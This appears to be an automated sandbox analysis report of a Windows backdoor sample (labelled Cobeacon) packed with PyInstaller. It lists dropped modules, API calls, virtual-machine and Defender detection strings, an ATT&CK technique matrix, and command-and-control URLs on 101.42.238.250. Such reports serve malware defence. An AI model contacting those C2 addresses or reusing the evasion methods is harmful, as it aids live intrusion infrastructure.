        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cast.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\select.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cbc.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17873
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeAPI coverage: 0.6 %
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF602998300 FindFirstFileExW,FindClose,0_2_00007FF602998300
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF602997900 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF602997900
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B05F4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6029B05F4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF602998300 FindFirstFileExW,FindClose,1_2_00007FF602998300
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF602997900 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF602997900
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF6029B05F4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6029B05F4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0079A1B0 FindFirstFileExW,FindClose,FindNextFileW,1_2_00007FFE0079A1B0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0079A018 FindFirstFileExA,FindClose,FindNextFileA,1_2_00007FFE0079A018
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\Jump to behavior
        Source: DChOtFdp9T.exe, 00000000.00000003.1689611725.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, cacert.pem.0.drBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
        Source: Amcache.hve.4.drBinary or memory string: VMware
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\n',
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874160118.000001780B2FF000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714766662.000001780A063000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: cacert.pem.0.drBinary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
        Source: Amcache.hve.4.drBinary or memory string: vmci.sys
        Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.4.drBinary or memory string: VMware20,1
        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A9494 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6029A9494
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B2200 GetProcessHeap,0_2_00007FF6029B2200
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF60299C37C SetUnhandledExceptionFilter,0_2_00007FF60299C37C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF60299C19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF60299C19C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF60299B910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF60299B910
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF60299C37C SetUnhandledExceptionFilter,1_2_00007FF60299C37C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF6029A9494 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6029A9494
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF60299C19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF60299C19C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF60299B910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF60299B910
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFABD2A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFDFABD2A70
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFABD3028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFABD3028
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24212B IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFF24212B
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE00798160 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE00798160
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0075EA58 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0075EA58
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CF91030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0CF91030
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CF91A80 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0CF91A80
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFB1A80 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0CFB1A80
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFB1030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0CFB1030
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFD1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0CFD1960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFD1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0CFD1390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFE1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0CFE1960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFE1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0CFE1390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E131960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0E131960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E131390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0E131390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E141960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0E141960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E141390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0E141390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E151960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0E151960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E151390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0E151390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E161960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0E161960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E161390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0E161390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess created: C:\Users\user\Desktop\DChOtFdp9T.exe "C:\Users\user\Desktop\DChOtFdp9T.exe"Jump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B85D0 cpuid 0_2_00007FF6029B85D0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00007FFE007920D8
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,1_2_00007FFE007909FC
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_00007FFE007922E0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetPrimaryLen,EnumSystemLocalesW,1_2_00007FFE00791BE4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: EnumSystemLocalesW,1_2_00007FFE00791B7C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetPrimaryLen,EnumSystemLocalesW,1_2_00007FFE00791C98
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetLastError,Concurrency::details::_Concurrent_queue_iterator_base_v4::~_Concurrent_queue_iterator_base_v4,GetLocaleInfoW,GetLocaleInfoW,1_2_00007FFE0073EDE4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetLocaleInfoW,1_2_00007FFE0074257C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: WideCharToMultiByte,GetLocaleInfoW,GetLocaleInfoW,1_2_00007FFE0073EFA4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\certifi VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography-43.0.3.dist-info\license_files VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\ucrtbase.dll VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_ctypes.pyd VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_bz2.pyd VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_lzma.pyd VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_wmi.pyd VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_socket.pyd VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\select.pyd VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_queue.pyd VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_ssl.pyd VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_asyncio.pyd VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_overlapped.pyd VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\pyexpat.pyd VolumeInformation
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Code function: 0_2_00007FF60299C080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF60299C080
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe Code function: 0_2_00007FF6029B4A80 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6029B4A80
        Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
        Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe

        Remote Access Functionality

        Source: Yara match File source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 2 Virtualization/Sandbox Evasion | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 22 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 41 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 112 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 33 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        Source | Detection | Scanner | Label | Link
        DChOtFdp9T.exe | 64% | Virustotal | | Browse
        DChOtFdp9T.exe | 45% | ReversingLabs | Win64.Backdoor.Cobeacon |
        Source | Detection | Scanner | Label | Link
        http://01.42.238.250:443/Ye3l | 0% | Avira URL Cloud | safe |
        http://101.42.238.250/b.txt | 0% | Avira URL Cloud | safe |
        http://httpbin.org/ | 0% | Avira URL Cloud | safe |
        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warningsThe | 0% | Avira URL Cloud | safe |
        https://setuptools.pypa.io/en/latest/ | 0% | Avira URL Cloud | safe |
        http://101.42.238.250:443/Ye3l2G7cghlI | 0% | Avira URL Cloud | safe |
        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings | 0% | Avira URL Cloud | safe |
        http://ocsp.digicert | 0% | Avira URL Cloud | safe |
        http://101.42.238.250/b.txtng.utils | 0% | Avira URL Cloud | safe |
        http://101.42.238.250:443/Ye3l | 0% | Avira URL Cloud | safe |
        http://101.42.238.250/a.txt | 0% | Avira URL Cloud | safe |
        https://101.42.238.250:443/Ye3l | 0% | Avira URL Cloud | safe |
        https://w3c.github.io/html/sec-forms.html#multipart-form-data | 0% | Avira URL Cloud | safe |
        https://peps.python.org/pep-0685/ | 0% | Avira URL Cloud | safe |
        https://requests.readthedocs.ioe | 0% | Avira URL Cloud | safe |
        No contacted domains info
        Name | Malicious | Antivirus Detection | Reputation
        http://01.42.238.250:443/Ye3l | true | Avira URL Cloud: safe | unknown
        http://101.42.238.250/b.txt | true | Avira URL Cloud: safe | unknown
        http://101.42.238.250/a.txt | true | Avira URL Cloud: safe | unknown
        https://101.42.238.250:443/Ye3l | true | Avira URL Cloud: safe | unknown
                                                                                                                                                          http://tools.ietf.org/html/rfc4880DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://peps.python.org/pep-0685/DChOtFdp9T.exe, 00000001.00000002.1873602922.000001780AA90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://requests.readthedocs.ioDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780B9B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdfDChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbcaDChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://github.com/pypa/setuptools/issues/1024.DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.python.orgDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/DChOtFdp9T.exe, 00000001.00000003.1711960046.000001780A3DF000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715551471.000001780A461000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1711700382.000001780A3B0000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715097518.000001780A3A1000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714396387.000001780A461000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.tarsnap.com/scrypt/scrypt-slides.pdfDChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdfDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B1FB000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B026000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874500664.000001780BAF0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780BA6C000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874500664.000001780BAB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780B9B0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.python.org/DChOtFdp9T.exe, 00000001.00000002.1872730547.000001780A0FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
